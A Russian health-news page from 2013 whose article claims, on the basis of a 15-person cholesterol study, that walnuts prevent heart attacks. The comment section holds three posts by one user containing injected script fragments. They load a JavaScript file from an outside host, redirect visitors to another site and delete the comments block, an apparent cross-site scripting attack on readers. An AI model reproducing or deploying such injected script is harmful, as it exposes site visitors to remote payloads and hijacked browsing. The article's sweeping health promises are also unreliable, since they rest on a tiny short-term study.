Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Получите на орехи! Грецки...  >>  Получите на орехи! Грецкие орехи спасут от инфаркта
 
Обратная связь
 

Получите на орехи! Грецкие орехи спасут от инфаркта

Размер шрифта
25 июня 2013 00:00
Юрий Малышев
Здоровье инфо
Татьяна Дубровская
Здоровье инфо
  • google_analytics: false
  • Нравится

Заболевания сердца и сосудов виноваты в половине всех смертей в России. Ученные утверждают, что обычные грецкие орехи смогут избавить нас от этой эпидемии.

 грецкий орех

В исследование были включены 15 человек с повышенным уровнем холестерина. Участникам исследования давали ежедневно 85 грамм цельных грецких орехов, 6 граммов измельченной скорлупы, 34 грамма обезжиренных орехов, 51 грамм масла. Перед тем, как проводить исследование, ученые взяли биохимические анализы крови у испытуемых. Затем ученые измеряли показатели через 30 минут, час, два часа и через шесть часов после проведенного лечения. 

Результаты исследования показали, что потребление масла из грецких орехов благоприятно сказывается на здоровье сосудов. Однако выяснилось, что не масло, а сами грецкие орехи эффективнее для удалении избытка «плохого» холестерина», увеличивая содержание в крови липопротеидов высокой плотности, то есть «хорошего» холестерина. «Плохой» холестерин имеет свойство откладываться на клетках внутренней оболочки сосудов (эндотелии) только в том случае, если она изначально была повреждена, что часто происходит у людей с сердечно-сосудистыми заболеваниями. Именно масло грецких орехов предотвращает повреждение сосудистой стенки, что препятствует прикреплению к ней холестерина и образованию сосудистых атеросклеротических бляшек.

Свойства грецких орехов объясняются найденными в них альфа-линолевой кислотой, гамма-токоферолом (витамина Е) и фитостеролами. Эти три вещества являются антиоксидантами и предотвращают губительное действие свободных радикалов, образующихся при окислении различных биохимических веществ, на стенку сосудов.

Так что бегом в магазин за орехами!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:12

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:12

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как угробить свое сердце?!   Еще один повод ходить на работу! Бедные умирают в 2 раза чаще богатых!   Сенсация! Ученые сумели превратить мышиное сердце в человеческое!   У вас больное сердце! Нет? А если нагнуться?  
22 июня 2013Грецкие орехи спасут от инфаркта 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 
20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
У вас повышенный холестерин. Что дальше?
Как решить все проблемы за 90 секунд. Часть 1
6 суперпродуктов от диабета

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.